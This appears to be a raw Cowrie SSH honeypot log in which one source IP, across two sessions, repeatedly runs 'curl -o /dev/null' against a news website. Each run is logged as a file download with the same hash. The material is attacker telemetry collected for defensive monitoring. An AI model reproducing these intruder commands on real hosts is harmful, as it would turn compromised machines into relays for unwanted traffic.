{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.131641Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.161698Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.163439Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.164296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.167352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.168165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.203356Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.204213Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.207005Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.207967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.239296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.240097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.245950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.246626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.251286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.280470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.281272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.286758Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.287421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.315293Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.316089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.324140Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.324807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.350492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.351386Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.363533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.364365Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.387109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.388223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.400741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.401650Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.425444Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.426278Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.446415Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.447215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.464189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.464999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.468996Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.489681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.490545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.497292Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.498994Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.503207Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.507838Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.508703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.513756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.518067Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.522845Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.527017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.527710Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.539520Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.546986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.547725Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.552500Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.565267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.566024Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.584290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.585057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.606550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.607396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.621289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.622399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.643345Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.646513Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.648061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.648553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.659365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.660133Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.670438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.686938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.687940Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.691296Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.695311Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.696124Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.707804Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.726460Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.727442Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.733284Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.734893Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.737533Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.738736Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.739798Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.740676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.752578Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.765810Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.768790Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.772131Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.773737Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.774546Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.778130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.779112Z","src_ip":"212.227.125.160","session":"7541ed730449"}
